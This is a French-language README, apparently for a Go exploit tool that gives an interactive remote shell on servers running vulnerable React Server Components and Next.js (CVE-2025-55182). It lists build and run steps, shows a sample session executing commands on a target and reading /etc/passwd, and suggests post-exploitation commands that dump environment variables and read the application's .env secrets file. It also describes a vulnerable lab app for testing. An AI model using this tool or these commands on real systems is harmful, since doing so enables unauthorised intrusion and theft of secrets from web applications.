
Outil d'exploitation RCE ciblant CVE-2025-55182, une vulnérabilité critique dans React Server Components (RSC) affectant React 19.0.0 - 19.2.0 et les applications Next.js.
Outil interactif d'exploitation RCE pour CVE-2025-55182 (React Server Components)
CVE-2025-55182 est un outil d'exploitation RCE minimal et interactif ciblant CVE-2025-55182, une vulnérabilité critique dans les React Server Components (RSC) affectant React 19.0.0 - 19.2.0 et les applications Next.js.
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go
./CVE-2025-55182
_____________ _______________ _______________ ________ .________ .________.____________ ______ ________
╲_ ___ ╲ ╲ ╱ ╱╲_ _____╱ ╲_____ ╲ _ ╲ ╲_____ ╲ │ ____╱ │ ____╱│ ____╱_ │╱ __ ╲ ╲_____ ╲
╱ ╲ ╲╱╲ Y ╱ │ __)_ ______ ╱ ____╱ ╱_╲ ╲ ╱ ____╱ │____ ╲ ______ │____ ╲ │____ ╲ │ │> < ╱ ____╱
╲ ╲____╲ ╱ │ ╲ ╱_____╱ ╱ ╲ ╲_╱ ╲╱ ╲ ╱ ╲ ╱_____╱ ╱ ╲╱ ╲│ ╱ ── ╲╱ ╲
╲______ ╱ ╲___╱ ╱_______ ╱ ╲_______ ╲_____ ╱╲_______ ╲╱______ ╱ ╱______ ╱______ ╱│___╲______ ╱╲_______ ╲
╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱
React2Shell RCE | CVE-2025-55182
@hghost010
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Cible : localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNÉRABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)
ghost@rce $ whoami
node
ghost@rce $ pwd
/app
ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash
ghost@rce $ exit
Versions concernées :
Versions corrigées :
Vous voulez tester en toute sécurité ? Configurez un environnement de laboratoire vulnérable :
# Cloner l'application Next.js vulnérable
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182
# Installer et lancer
npm install --legacy-peer-deps
npm run dev
# Dans un autre terminal, lancer ghost-scanner
./CVE-2025-55182
# Entrer : localhost:3000
ghost@rce $ id # Vérifier les privilèges utilisateur
ghost@rce $ whoami # Nom d'utilisateur actuel
ghost@rce $ pwd # Répertoire actuel
ghost@rce $ ls -la # Lister les fichiers
ghost@rce $ cat /etc/passwd # Lire des fichiers
ghost@rce $ uname -a # Informations système
ghost@rce $ env # Variables d'environnement
ghost@rce $ ps aux # Processus en cours
ghost@rce $ netstat -tulpn # Connexions réseau
ghost@rce $ cat /app/.env # Secrets de l'application
Vous avez trouvé un bug ? Ouvrez une issue
Si cet outil vous a aidé :
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Fabriqué avec 👻 par Hghost0x00
Bon hacking ⚡